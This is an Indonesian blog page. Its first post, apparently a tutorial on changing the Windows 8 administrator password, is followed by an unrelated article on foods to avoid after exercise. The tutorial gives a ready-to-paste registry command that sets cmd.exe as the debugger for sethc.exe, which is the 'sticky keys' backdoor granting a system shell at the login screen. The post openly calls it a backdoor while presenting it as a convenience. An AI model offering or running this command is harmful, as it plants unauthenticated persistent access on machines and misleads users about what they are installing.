Mengganti Password Administrator di Windows 8 Tanpa Ribet

Wah sudah lama ga nulis, ini abis iseng-iseng browsing-browsing nemu website bagus banget buat belajar oprek windows kalian.

Selama ini kan kita untuk mengganti password account kita sudah disediakan sama si Windows nya, buka sana buka sini edit. Kelamaan sekarang cukup buka Command Prompt tapi syaratnya harus dengan login administrator yah.

klik icon windows di keyboard kalian lalu ketikan CMD

find-cmd

atau yang lebih mudah klik tombol Shift 5x atau bisa juga kombinasi Alt-Shift-Prt Sc

cmd

Sumpah 2 cara diatas gw baru tau barusan.

Lanjut kita ke Topik awal, setelah CMD muncul jalankannya sebagai Administrator yah ( Icon CMD klik kanan run as Administrator)

 

klik-kanan-cmd

neh kode untuk bikin backdoor nya, biar kerjaan nya sukses. Copy trus Paste di Command Prompt kalian yo..

REG ADD “HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe” /v Debugger /t REG_SZ /d “C:\windows\system32\cmd.exe”

add-reg-cmd

Kalau sudah di Paste langsung keluar kata-kata sukses.

add-reg-cmd-success

Kalau mau di coba lagi nanti keluar seperti dibawah ini

add-reg-cmd-overwriteTinggal ketik Yes, beres.

Nah, udah 90% neh kerjaannya keliatannya panjang tapi padahal cuma gitu aja ini.

setelah itu langsung mulai dengan pergantian password nya, masih dengan pakai CMD ini. Perintahnya :

Net user user_name new_password —> ini untuk existing username seperti administrator or user biasa

Contohnya :

Net user administrator xxxx

cmd-edit-password

Sukses

cmd-edit-password-success

Berhasil.

Selamat mencoba yo..

Advertisements
By Alam Jaya Posted in Ngelmu

Dilarang Makan Ini Sesudah Olahraga

Metrotvnews.com, Jakarta: Olahraga tentu saja sangat bermanfaat bagi kebugaran tubuh. Namun, Anda jangan sembarang menyantap makanan usai olahraga jika tak ingin olahraga tadi sia-sia.

Para ahli megatakan bahwa untuk memeroleh makan sempurna pasca olahraga, Anda harus menggabungkan antara karbohidrat kompleks, air, dan protein.

Nyatanya, banyak orang cenderung mengonsumsi glukosa ketika selesai berolahraga.

Nah, agar Anda mendapat manfaat optimal dari olahraga, hindari makanan berikut usai berlatih:

Keju
Keju adalah salah satu makanan yang wajib Anda hindari setelah berolahraga. Itu karena keju mengandung lemak jenuh dalam jumlah besar dan mengandung garam. Namun, jika Anda ketagihan snack asin, keripik kedelai rasa keju bisa menjadi alternatif.

Daging olahan
Daging olahan dalam sandwich juga tinggi lemak dan garam. Mengonsumsi daging olahan setelah Anda melakukan aktivitas berat hanya akan memperlambat pencernaan. Anda bisa makan sandwich ayam rebus sebagai gantinya.

Sereal
Meskipun sereal dikatakan sehat, makanan ini justru mengandung banyak gula. Jadi, pastikan Anda menjauhi sereal jika baru saja selesai menjalani latihan.

Roti
Tepung dalam roti bisa berubah menjadi gula, dan itu tentu saja tidak dibutuhkan tubuh Anda setelah olahraga. Tubuh Anda perlu nutrisi. Jadi, jika Anda ingin makan roti, pilihlah roti gandum.

Minuman buah
Minuman dengan aneka rasa buah tinggi akan gula. Ini tentu saja merusak latihan yang baru saja Anda lakukan dan meningkatkan kadar gula. Jika Anda menginginkan minuman selain air putih, coba es teh herbal atau minum segelas air kelapa. Teh herbal dan air kelapa lebih alami dan sehat.

Telur
Telur dianggap sebagai makanan ringan setelah latihan karena mengandung protein dan kolin yang baik untuk jantung. Namun, sebaiknya hidari telur yang digoreng karena mengandung lemak. Lebih baik jika Anda makan telur yang direbus.

Sayuran Mentah
Sayuran mentah memang kaya nutrisi, tapi itu tidak dapat membuat Anda berenergi setelah melakukan latihan berat. Anda membutuhkan sesuatu yang lebih besar. Para ahli gizi menyarankan agar Anda menambahkan protein tinggi seperti saus yoghurt.

(Ningtriasih/Times of India) 
(ROS )